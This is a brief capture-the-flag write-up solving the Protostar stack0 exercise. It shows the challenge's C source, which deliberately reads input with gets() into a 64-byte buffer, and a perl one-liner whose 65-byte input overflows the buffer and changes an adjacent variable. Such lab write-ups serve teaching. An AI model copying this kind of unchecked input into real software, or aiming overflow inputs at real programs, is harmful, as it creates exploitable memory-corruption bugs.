Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/stack0
test
Try again?

Exploit

Make the program respond with the message “you have changed the ‘modified’ variable”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 modified = 0;
 gets(buffer);

 if(modified != 0) {
 printf("you have changed the 'modified' variable\n");
 } else {
 printf("Try again?\n");
 }
}

We can see the challenge statement will be displayed if the ‘modified’ variable is not zero.

Can we corrupt the memory stack using the gets(buffer) call and overwrite the modified variable?

Let’s see

user@protostar:~$ perl -e 'print "A"x65'|/opt/protostar/bin/stack0
you have changed the 'modified' variable

Using perl we were able to overflow the buffer where ‘buffer’ variable was being stored. We wrote out 65 A’s to stdout and this was one byte more than was allocated and must have hit the ‘modified’ variable.

I won’t go into more detail because this was simple and the latter challenges will take up more time.

Thank you